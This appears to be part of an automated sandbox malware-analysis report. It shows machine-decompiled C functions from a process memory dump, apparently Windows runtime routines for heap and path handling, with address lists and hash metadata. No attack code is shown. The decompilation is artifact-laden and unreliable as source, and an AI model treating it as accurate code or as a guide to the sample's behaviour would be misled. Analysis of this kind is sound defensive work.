                                  								 *(_t79 + 0xf74) = 0x100;
                                  								_t75 = 0;
                                  								_t73 = 4;
                                  								_v60 =  &_v68;
                                  								_v52 = _t73;
                                  								_v36 = _t73;
                                  								_t74 = _v76;
                                  								_v44 =  &_v72;
                                  								 *0x3518774 = 1;
                                  								_v56 = 0;
                                  								_v28 = _t74[2];
                                  								_v48 = 0;
                                  								_v20 = ( *_t74 & 0x0000ffff) + 2;
                                  								_v40 = 0;
                                  								_v32 = 0;
                                  								_v24 = 0;
                                  								_v16 = 0;
                                  								if(E0342B6F0(0x340c338, 0x340c288, 3,  &_v60) == 0) {
                                  									_v80 = _v80 | 0xffffffff;
                                  									_push( &_v84);
                                  									_push(0);
                                  									_push(_v64);
                                  									_v84 = 0xfa0a1f00;
                                  									E03469520();
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  				if(_v64 != 0) {
                                  					_push(_v64);
                                  					E034695D0();
                                  					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                                  					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                                  				}
                                  				if(_t77 != 0) {
                                  					E0343FFB0(_t68, _t77, 0x3518778);
                                  				}
                                  				_pop(_t78);
                                  				return E0346B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                                  			}
































                                  0x034a69b5
                                  0x034a69be
                                  0x034a69c3
                                  0x034a69c9
                                  0x034a69cc
                                  0x034a69d1
                                  0x034a69d3
                                  0x034a69de
                                  0x034a69e1
                                  0x034a69ea
                                  0x034a69f6
                                  0x034a69fe
                                  0x034a6a13
                                  0x034a6a14
                                  0x034a6a15
                                  0x034a6a16
                                  0x034a6a1e
                                  0x034a6a26
                                  0x034a6a31
                                  0x034a6a36
                                  0x034a6a37
                                  0x034a6a40
                                  0x034a6a49
                                  0x034a6a4a
                                  0x034a6a53
                                  0x034a6a59
                                  0x034a6a5d
                                  0x034a6a5e
                                  0x034a6a64
                                  0x034a6a67
                                  0x034a6a6a
                                  0x034a6a6d
                                  0x034a6a70
                                  0x034a6a77
                                  0x034a6a7d
                                  0x034a6a86
                                  0x034a6a89
                                  0x034a6a9c
                                  0x034a6a9f
                                  0x034a6aa2
                                  0x034a6aa5
                                  0x034a6aaf
                                  0x034a6ab1
                                  0x034a6ab8
                                  0x034a6ab9
                                  0x034a6abb
                                  0x034a6abe
                                  0x034a6ac5
                                  0x034a6ac5
                                  0x034a6aaf
                                  0x034a6a40
                                  0x034a6a26
                                  0x034a69fe
                                  0x034a6ace
                                  0x034a6ad0
                                  0x034a6ad3
                                  0x034a6ad8
                                  0x034a6adf
                                  0x034a6adf
                                  0x034a6ae8
                                  0x034a6aef
                                  0x034a6aef
                                  0x034a6af9
                                  0x034a6b06

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e653b300b8cd51a3d4889ee698e91d8e3ebb4f647f25b111f54f961cb506157a
                                  • Instruction ID: b583cf39de59d019eb74845512e87e0b1367d1d2f90d61ba4436bb7445ffd73e
                                  • Opcode Fuzzy Hash: e653b300b8cd51a3d4889ee698e91d8e3ebb4f647f25b111f54f961cb506157a
                                  • Instruction Fuzzy Hash: 33418CB1E00708AFDB20DFA9D840BAEFBF4EF48304F18812AE814AB250DB749905CB55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E03425210(intOrPtr _a4, void* _a8) {
                                  				void* __ecx;
                                  				intOrPtr _t31;
                                  				signed int _t32;
                                  				signed int _t33;
                                  				intOrPtr _t35;
                                  				signed int _t52;
                                  				void* _t54;
                                  				void* _t56;
                                  				unsigned int _t59;
                                  				signed int _t60;
                                  				void* _t61;
                                  
                                  				_t61 = E034252A5(1);
                                  				if(_t61 == 0) {
                                  					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                  					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                                  					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                                  				} else {
                                  					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                                  					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                                  				}
                                  				_t60 = _t59 >> 1;
                                  				_t32 = 0x3a;
                                  				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                                  					_t52 = _t60 + _t60;
                                  					if(_a4 > _t52) {
                                  						goto L5;
                                  					}
                                  					if(_t61 != 0) {
                                  						asm("lock xadd [esi], eax");
                                  						if((_t32 | 0xffffffff) == 0) {
                                  							_push( *((intOrPtr*)(_t61 + 4)));
                                  							E034695D0();
                                  							L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                  						}
                                  					} else {
                                  						E0343EB70(_t54, 0x35179a0);
                                  					}
                                  					_t26 = _t52 + 2; // 0xddeeddf0
                                  					return _t26;
                                  				} else {
                                  					_t52 = _t60 + _t60;
                                  					if(_a4 < _t52) {
                                  						if(_t61 != 0) {
                                  							asm("lock xadd [esi], eax");
                                  							if((_t32 | 0xffffffff) == 0) {
                                  								_push( *((intOrPtr*)(_t61 + 4)));
                                  								E034695D0();
                                  								L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                  							}
                                  						} else {
                                  							E0343EB70(_t54, 0x35179a0);
                                  						}
                                  						return _t52;
                                  					}
                                  					L5:
                                  					_t33 = E0346F3E0(_a8, _t54, _t52);
                                  					if(_t61 == 0) {
                                  						E0343EB70(_t54, 0x35179a0);
                                  					} else {
                                  						asm("lock xadd [esi], eax");
                                  						if((_t33 | 0xffffffff) == 0) {
                                  							_push( *((intOrPtr*)(_t61 + 4)));
                                  							E034695D0();
                                  							L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                  						}
                                  					}
                                  					_t35 = _a8;
                                  					if(_t60 <= 1) {
                                  						L9:
                                  						_t60 = _t60 - 1;
                                  						 *((short*)(_t52 + _t35 - 2)) = 0;
                                  						goto L10;
                                  					} else {
                                  						_t56 = 0x3a;
                                  						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                                  							 *((short*)(_t52 + _t35)) = 0;
                                  							L10:
                                  							return _t60 + _t60;
                                  						}
                                  						goto L9;
                                  					}
                                  				}
                                  			}














                                  0x03425220
                                  0x03425224
                                  0x03480d13
                                  0x03480d16
                                  0x03480d19
                                  0x0342522a
                                  0x0342522a
                                  0x0342522d
                                  0x0342522d
                                  0x03425231
                                  0x03425235
                                  0x03425239
                                  0x03480d5c
                                  0x03480d62
                                  0x00000000
                                  0x00000000
                                  0x03480d6a
                                  0x03480d7b
                                  0x03480d7f
                                  0x03480d81
                                  0x03480d84
                                  0x03480d95
                                  0x03480d95
                                  0x03480d6c
                                  0x03480d71
                                  0x03480d71
                                  0x03480d9a
                                  0x00000000
                                  0x0342524a
                                  0x0342524a
                                  0x03425250
                                  0x03480d24
                                  0x03480d35
                                  0x03480d39
                                  0x03480d3b
                                  0x03480d3e
                                  0x03480d50
                                  0x03480d50
                                  0x03480d26
                                  0x03480d2b
                                  0x03480d2b
                                  0x00000000
                                  0x03480d55
                                  0x03425256
                                  0x0342525b
                                  0x03425265
                                  0x03480da7
                                  0x0342526b
                                  0x0342526e
                                  0x03425272
                                  0x03480db1
                                  0x03480db4
                                  0x03480dc5
                                  0x03480dc5
                                  0x03425272
                                  0x03425278
                                  0x0342527e
                                  0x0342528a
                                  0x0342528c
                                  0x0342528d
                                  0x00000000
                                  0x03425280
                                  0x03425282
                                  0x03425288
                                  0x0342529f
                                  0x03425292
                                  0x00000000
                                  0x03425292
                                  0x00000000
                                  0x03425288
                                  0x0342527e

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 83b4a4c2546b3790b71871a353c2e66b636e7ba72cdf53f2876846bfe8a3fdab
                                  • Instruction ID: c9f78dad4a7515ac8ed4ecde3f0ec8339c8061b1621d3714e5ebd4b01c585468
                                  • Opcode Fuzzy Hash: 83b4a4c2546b3790b71871a353c2e66b636e7ba72cdf53f2876846bfe8a3fdab
                                  • Instruction Fuzzy Hash: C331F332251B10EFC722EB19CD40B2ABBA5FF01764F55466BE4251F2E0DB70E845CAAC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 78%
                                  			E0345A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                  				intOrPtr _t35;
                                  				intOrPtr _t39;
                                  				intOrPtr _t45;
                                  				intOrPtr* _t51;
                                  				intOrPtr* _t52;
                                  				intOrPtr* _t55;
                                  				signed int _t57;
                                  				intOrPtr* _t59;
                                  				intOrPtr _t68;
                                  				intOrPtr* _t77;
                                  				void* _t79;
                                  				signed int _t80;
                                  				intOrPtr _t81;
                                  				char* _t82;
                                  				void* _t83;
                                  
                                  				_push(0x24);
                                  				_push(0x3500220);
                                  				E0347D08C(__ebx, __edi, __esi);
                                  				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
                                  				_t79 = __ecx;
                                  				_t35 =  *0x3517b9c; // 0x0
                                  				_t55 = L03444620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
                                  				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
                                  				if(_t55 == 0) {
                                  					_t39 = 0xc0000017;
                                  					L11:
                                  					return E0347D0D1(_t39);
                                  				}
                                  				_t68 = 0;
                                  				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
                                  				 *(_t83 - 4) =  *(_t83 - 4) & 0;
                                  				_t7 = _t55 + 8; // 0x8
                                  				_t57 = 6;
                                  				memcpy(_t7, _t79, _t57 << 2);
                                  				_t80 = 0xfffffffe;
                                  				 *(_t83 - 4) = _t80;
                                  				if(0 < 0) {
                                  					L14:
                                  					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                  					L20:
                                  					L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
                                  					_t39 = _t81;
                                  					goto L11;
                                  				}
                                  				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
                                  					_t81 = 0xc000007b;
                                  					goto L20;
                                  				}
                                  				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
                                  					_t59 =  *((intOrPtr*)(_t83 + 8));
                                  					_t45 =  *_t59;
                                  					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
                                  					 *_t59 = _t45 + 1;
                                  					L6:
                                  					 *(_t83 - 4) = 1;
                                  					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
                                  					 *(_t83 - 4) = _t80;
                                  					if(_t68 < 0) {
                                  						_t82 =  *((intOrPtr*)(_t83 + 0xc));
                                  						if(_t82 == 0) {
                                  							goto L14;
                                  						}
                                  						asm("btr eax, ecx");
                                  						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                  						if( *_t82 != 0) {
                                  							 *0x3517b10 =  *0x3517b10 - 8;
                                  						}
                                  						goto L20;
                                  					}
                                  					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
                                  					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
                                  					_t51 =  *0x351536c; // 0x77e05368
                                  					if( *_t51 != 0x3515368) {
                                  						_push(3);
                                  						asm("int 0x29");
                                  						goto L14;
                                  					}
                                  					 *_t55 = 0x3515368;
                                  					 *((intOrPtr*)(_t55 + 4)) = _t51;
                                  					 *_t51 = _t55;
                                  					 *0x351536c = _t55;
                                  					_t52 =  *((intOrPtr*)(_t83 + 0x10));
                                  					if(_t52 != 0) {
                                  						 *_t52 = _t55;
                                  					}
                                  					_t39 = 0;
                                  					goto L11;
                                  				}
                                  				_t77 =  *((intOrPtr*)(_t83 + 8));
                                  				_t68 = E0345A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
                                  				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
                                  				if(_t68 < 0) {
                                  					goto L14;
                                  				}
                                  				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
                                  				goto L6;
                                  			}


















                                  0x0345a61c
                                  0x0345a61e
                                  0x0345a623
                                  0x0345a628
                                  0x0345a62b
                                  0x0345a62d
                                  0x0345a648
                                  0x0345a64a
                                  0x0345a64f
                                  0x03499b44
                                  0x0345a6ec
                                  0x0345a6f1
                                  0x0345a6f1
                                  0x0345a655
                                  0x0345a657
                                  0x0345a65a
                                  0x0345a65d
                                  0x0345a662
                                  0x0345a663
                                  0x0345a667
                                  0x0345a668
                                  0x0345a66d
                                  0x0345a706
                                  0x0345a706
                                  0x03499bda
                                  0x03499be6
                                  0x03499beb
                                  0x00000000
                                  0x03499beb
                                  0x0345a679
                                  0x03499b7a
                                  0x00000000
                                  0x03499b7a
                                  0x0345a683
                                  0x0345a6f4
                                  0x0345a6f7
                                  0x0345a6f9
                                  0x0345a6fd
                                  0x0345a6a0
                                  0x0345a6a0
                                  0x0345a6ad
                                  0x0345a6af
                                  0x0345a6b4
                                  0x03499ba7
                                  0x03499bac
                                  0x00000000
                                  0x00000000
                                  0x03499bc6
                                  0x03499bce
                                  0x03499bd1
                                  0x03499bd3
                                  0x03499bd3
                                  0x00000000
                                  0x03499bd1
                                  0x0345a6bd
                                  0x0345a6c3
                                  0x0345a6c6
                                  0x0345a6d2
                                  0x0345a701
                                  0x0345a704
                                  0x00000000
                                  0x0345a704
                                  0x0345a6d4
                                  0x0345a6d6
                                  0x0345a6d9
                                  0x0345a6db
                                  0x0345a6e1
                                  0x0345a6e6
                                  0x0345a6e8
                                  0x0345a6e8
                                  0x0345a6ea
                                  0x00000000
                                  0x0345a6ea
                                  0x0345a688
                                  0x0345a692
                                  0x0345a694
                                  0x0345a699
                                  0x00000000
                                  0x00000000
                                  0x0345a69d
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ab33e241dba3e30e9b065db1d3bf880593946e9903e07f8280e8f6df4c6372ec
                                  • Instruction ID: 7391c99340d96dfbce1d1edc4c8cc8ae30363c5c3352d1fc409a6fa7111d9887
                                  • Opcode Fuzzy Hash: ab33e241dba3e30e9b065db1d3bf880593946e9903e07f8280e8f6df4c6372ec
                                  • Instruction Fuzzy Hash: 254168B5E01205DFDB05CF59C490B9ABBF1BB49300F1881AEE814AF355D778A902CF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E03463D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                  				intOrPtr _v8;
                                  				char _v12;
                                  				signed short** _t33;
                                  				short* _t38;
                                  				intOrPtr* _t39;
                                  				intOrPtr* _t41;
                                  				signed short _t43;
                                  				intOrPtr* _t47;
                                  				intOrPtr* _t53;
                                  				signed short _t57;
                                  				intOrPtr _t58;
                                  				signed short _t60;
                                  				signed short* _t61;
                                  
                                  				_t47 = __ecx;
                                  				_t61 = __edx;
                                  				_t60 = ( *__ecx & 0x0000ffff) + 2;
                                  				if(_t60 > 0xfffe) {
                                  					L22:
                                  					return 0xc0000106;
                                  				}
                                  				if(__edx != 0) {
                                  					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                                  						L5:
                                  						E03437B60(0, _t61, 0x34011c4);
                                  						_v12 =  *_t47;
                                  						_v12 = _v12 + 0xfff8;
                                  						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                                  						E03437B60(0xfff8, _t61,  &_v12);
                                  						_t33 = _a8;
                                  						if(_t33 != 0) {
                                  							 *_t33 = _t61;
                                  						}
                                  						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                                  						_t53 = _a12;
                                  						if(_t53 != 0) {
                                  							_t57 = _t61[2];
                                  							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                                  							while(_t38 >= _t57) {
                                  								if( *_t38 == 0x5c) {
                                  									_t41 = _t38 + 2;
                                  									if(_t41 == 0) {
                                  										break;
                                  									}
                                  									_t58 = 0;
                                  									if( *_t41 == 0) {
                                  										L19:
                                  										 *_t53 = _t58;
                                  										goto L7;
                                  									}
                                  									 *_t53 = _t41;
                                  									goto L7;
                                  								}
                                  								_t38 = _t38 - 2;
                                  							}
                                  							_t58 = 0;
                                  							goto L19;
                                  						} else {
                                  							L7:
                                  							_t39 = _a16;
                                  							if(_t39 != 0) {
                                  								 *_t39 = 0;
                                  								 *((intOrPtr*)(_t39 + 4)) = 0;
                                  								 *((intOrPtr*)(_t39 + 8)) = 0;
                                  								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                                  							}
                                  							return 0;
                                  						}
                                  					}
                                  					_t61 = _a4;
                                  					if(_t61 != 0) {
                                  						L3:
                                  						_t43 = L03444620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                                  						_t61[2] = _t43;
                                  						if(_t43 == 0) {
                                  							return 0xc0000017;
                                  						}
                                  						_t61[1] = _t60;
                                  						 *_t61 = 0;
                                  						goto L5;
                                  					}
                                  					goto L22;
                                  				}
                                  				_t61 = _a4;
                                  				if(_t61 == 0) {
                                  					return 0xc000000d;
                                  				}
                                  				goto L3;
                                  			}
















                                  0x03463d4c
                                  0x03463d50
                                  0x03463d55
                                  0x03463d5e
                                  0x0349e79a
                                  0x00000000
                                  0x0349e79a
                                  0x03463d68
                                  0x0349e789
                                  0x03463d9d
                                  0x03463da3
                                  0x03463daf
                                  0x03463db5
                                  0x03463dbc
                                  0x03463dc4
                                  0x03463dc9
                                  0x03463dce
                                  0x0349e7ae
                                  0x0349e7ae
                                  0x03463dde
                                  0x03463de2
                                  0x03463de7
                                  0x03463e0d
                                  0x03463e13
                                  0x03463e16
                                  0x03463e1e
                                  0x03463e25
                                  0x03463e28
                                  0x00000000
                                  0x00000000
                                  0x03463e2a
                                  0x03463e2f
                                  0x03463e37
                                  0x03463e37
                                  0x00000000
                                  0x03463e37
                                  0x03463e31
                                  0x00000000
                                  0x03463e31
                                  0x03463e20
                                  0x03463e20
                                  0x03463e35
                                  0x00000000
                                  0x03463de9
                                  0x03463de9
                                  0x03463de9
                                  0x03463dee
                                  0x03463dfd
                                  0x03463dff
                                  0x03463e02
                                  0x03463e05
                                  0x03463e05
                                  0x00000000
                                  0x03463df0
                                  0x03463de7
                                  0x0349e78f
                                  0x0349e794
                                  0x03463d79
                                  0x03463d84
                                  0x03463d89
                                  0x03463d8e
                                  0x00000000
                                  0x0349e7a4
                                  0x03463d96
                                  0x03463d9a
                                  0x00000000
                                  0x03463d9a
                                  0x00000000
                                  0x0349e794
                                  0x03463d6e
                                  0x03463d73
                                  0x00000000
                                  0x0349e7b5
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2858b0860667bdbd0dd60729756e3f73eb34c3d7e0bc4d8e344d06599fd7d35a
                                  • Instruction ID: 3ef9e625e28c6e7fef4557fe5e54574af6dd2bfaa12e06545760ce475cbe5205
                                  • Opcode Fuzzy Hash: 2858b0860667bdbd0dd60729756e3f73eb34c3d7e0bc4d8e344d06599fd7d35a
                                  • Instruction Fuzzy Hash: D3318139A05695DBD724CF29C841A6BBBB5EF45700B0980AFE459CF361E730D841C7AA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E0344C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                                  				signed int* _v8;
                                  				char _v16;
                                  				void* __ebx;
                                  				void* __edi;
                                  				signed char _t33;
                                  				signed char _t43;
                                  				signed char _t48;
                                  				signed char _t62;
                                  				void* _t63;
                                  				intOrPtr _t69;
                                  				intOrPtr _t71;
                                  				unsigned int* _t82;
                                  				void* _t83;
                                  
                                  				_t80 = __ecx;
                                  				_t82 = __edx;
                                  				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                                  				_t62 = _t33 >> 0x00000001 & 0x00000001;
                                  				if((_t33 & 0x00000001) != 0) {
                                  					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                                  					if(E03447D50() != 0) {
                                  						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                  					} else {
                                  						_t43 = 0x7ffe0386;
                                  					}
                                  					if( *_t43 != 0) {
                                  						_t43 = E034F8D34(_v8, _t80);
                                  					}
                                  					E03442280(_t43, _t82);
                                  					if( *((char*)(_t80 + 0xdc)) == 0) {
                                  						E0343FFB0(_t62, _t80, _t82);
                                  						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                                  						_t30 = _t80 + 0xd0; // 0xd0
                                  						_t83 = _t30;
                                  						E034F8833(_t83,  &_v16);
                                  						_t81 = _t80 + 0x90;
                                  						E0343FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                                  						_t63 = 0;
                                  						_push(0);
                                  						_push(_t83);
                                  						_t48 = E0346B180();
                                  						if(_a4 != 0) {
                                  							E03442280(_t48, _t81);
                                  						}
                                  					} else {
                                  						_t69 = _v8;
                                  						_t12 = _t80 + 0x98; // 0x98
                                  						_t13 = _t69 + 0xc; // 0x575651ff
                                  						E0344BB2D(_t13, _t12);
                                  						_t71 = _v8;
                                  						_t15 = _t80 + 0xb0; // 0xb0
                                  						_t16 = _t71 + 8; // 0x8b000cc2
                                  						E0344BB2D(_t16, _t15);
                                  						E0344B944(_v8, _t62);
                                  						 *((char*)(_t80 + 0xdc)) = 0;
                                  						E0343FFB0(0, _t80, _t82);
                                  						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                                  						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                                  						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                                  						 *(_t80 + 0xde) = 0;
                                  						if(_a4 == 0) {
                                  							_t25 = _t80 + 0x90; // 0x90
                                  							E0343FFB0(0, _t80, _t25);
                                  						}
                                  						_t63 = 1;
                                  					}
                                  					return _t63;
                                  				}
                                  				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                                  				if(_a4 == 0) {
                                  					_t24 = _t80 + 0x90; // 0x90
                                  					E0343FFB0(0, __ecx, _t24);
                                  				}
                                  				return 0;
                                  			}
















                                  0x0344c18d
                                  0x0344c18f
                                  0x0344c191
                                  0x0344c19b
                                  0x0344c1a0
                                  0x0344c1d4
                                  0x0344c1de
                                  0x03492d6e
                                  0x0344c1e4
                                  0x0344c1e4
                                  0x0344c1e4
                                  0x0344c1ec
                                  0x03492d7d
                                  0x03492d7d
                                  0x0344c1f3
                                  0x0344c1ff
                                  0x03492d88
                                  0x03492d8d
                                  0x03492d94
                                  0x03492d94
                                  0x03492d9f
                                  0x03492da4
                                  0x03492dab
                                  0x03492db0
                                  0x03492db2
                                  0x03492db3
                                  0x03492db4
                                  0x03492dbc
                                  0x03492dc3
                                  0x03492dc3
                                  0x0344c205
                                  0x0344c205
                                  0x0344c208
                                  0x0344c20e
                                  0x0344c211
                                  0x0344c216
                                  0x0344c219
                                  0x0344c21f
                                  0x0344c222
                                  0x0344c22c
                                  0x0344c234
                                  0x0344c23a
                                  0x0344c23f
                                  0x0344c245
                                  0x0344c24b
                                  0x0344c251
                                  0x0344c25a
                                  0x0344c276
                                  0x0344c27d
                                  0x0344c27d
                                  0x0344c25c
                                  0x0344c25c
                                  0x00000000
                                  0x0344c25e
                                  0x0344c1a4
                                  0x0344c1aa
                                  0x0344c1b3
                                  0x0344c265
                                  0x0344c26c
                                  0x0344c26c
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                  • Instruction ID: 8d4a6230255e0282c8257fd2a7f30b6e06aead9dfac84f8810902c836758c110
                                  • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                  • Instruction Fuzzy Hash: C531C275A0664ABEE704EBB5C480BEAF754BF46204F08416FD4184F201DB745A4ADBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 76%
                                  			E034A7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                                  				signed int _v8;
                                  				char _v588;
                                  				intOrPtr _v592;
                                  				intOrPtr _v596;
                                  				signed short* _v600;
                                  				char _v604;
                                  				short _v606;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed short* _t55;
                                  				void* _t56;
                                  				signed short* _t58;
                                  				signed char* _t61;
                                  				char* _t68;
                                  				void* _t69;
                                  				void* _t71;
                                  				void* _t72;
                                  				signed int _t75;
                                  
                                  				_t64 = __edx;
                                  				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                                  				_v8 =  *0x351d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                                  				_t55 = _a16;
                                  				_v606 = __ecx;
                                  				_t71 = 0;
                                  				_t58 = _a12;
                                  				_v596 = __edx;
                                  				_v600 = _t58;
                                  				_t68 =  &_v588;
                                  				if(_t58 != 0) {
                                  					_t71 = ( *_t58 & 0x0000ffff) + 2;
                                  					if(_t55 != 0) {
                                  						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                                  					}
                                  				}
                                  				_t8 = _t71 + 0x2a; // 0x28
                                  				_t33 = _t8;
                                  				_v592 = _t8;
                                  				if(_t71 <= 0x214) {
                                  					L6:
                                  					 *((short*)(_t68 + 6)) = _v606;
                                  					if(_t64 != 0xffffffff) {
                                  						asm("cdq");
                                  						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                                  						 *((char*)(_t68 + 0x28)) = _a4;
                                  						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                                  						 *((char*)(_t68 + 0x29)) = _a8;
                                  						if(_t71 != 0) {
                                  							_t22 = _t68 + 0x2a; // 0x2a
                                  							_t64 = _t22;
                                  							E034A6B4C(_t58, _t22, _t71,  &_v604);
                                  							if(_t55 != 0) {
                                  								_t25 = _v604 + 0x2a; // 0x2a
                                  								_t64 = _t25 + _t68;
                                  								E034A6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                                  							}
                                  							if(E03447D50() == 0) {
                                  								_t61 = 0x7ffe0384;
                                  							} else {
                                  								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                  							}
                                  							_push(_t68);
                                  							_push(_v592 + 0xffffffe0);
                                  							_push(0x402);
                                  							_push( *_t61 & 0x000000ff);
                                  							E03469AE0();
                                  						}
                                  					}
                                  					_t35 =  &_v588;
                                  					if( &_v588 != _t68) {
                                  						_t35 = L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                                  					}
                                  					L16:
                                  					_pop(_t69);
                                  					_pop(_t72);
                                  					_pop(_t56);
                                  					return E0346B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                                  				}
                                  				_t68 = L03444620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                                  				if(_t68 == 0) {
                                  					goto L16;
                                  				} else {
                                  					_t58 = _v600;
                                  					_t64 = _v596;
                                  					goto L6;
                                  				}
                                  			}






















                                  0x034a7016
                                  0x034a701e
                                  0x034a702b
                                  0x034a7033
                                  0x034a7037
                                  0x034a703c
                                  0x034a703e
                                  0x034a7041
                                  0x034a7045
                                  0x034a704a
                                  0x034a7050
                                  0x034a7055
                                  0x034a705a
                                  0x034a7062
                                  0x034a7062
                                  0x034a705a
                                  0x034a7064
                                  0x034a7064
                                  0x034a7067
                                  0x034a7071
                                  0x034a7096
                                  0x034a709b
                                  0x034a70a2
                                  0x034a70a6
                                  0x034a70a7
                                  0x034a70ad
                                  0x034a70b3
                                  0x034a70b6
                                  0x034a70bb
                                  0x034a70c3
                                  0x034a70c3
                                  0x034a70c6
                                  0x034a70cd
                                  0x034a70dd
                                  0x034a70e0
                                  0x034a70e2
                                  0x034a70e2
                                  0x034a70ee
                                  0x034a7101
                                  0x034a70f0
                                  0x034a70f9
                                  0x034a70f9
                                  0x034a710a
                                  0x034a710e
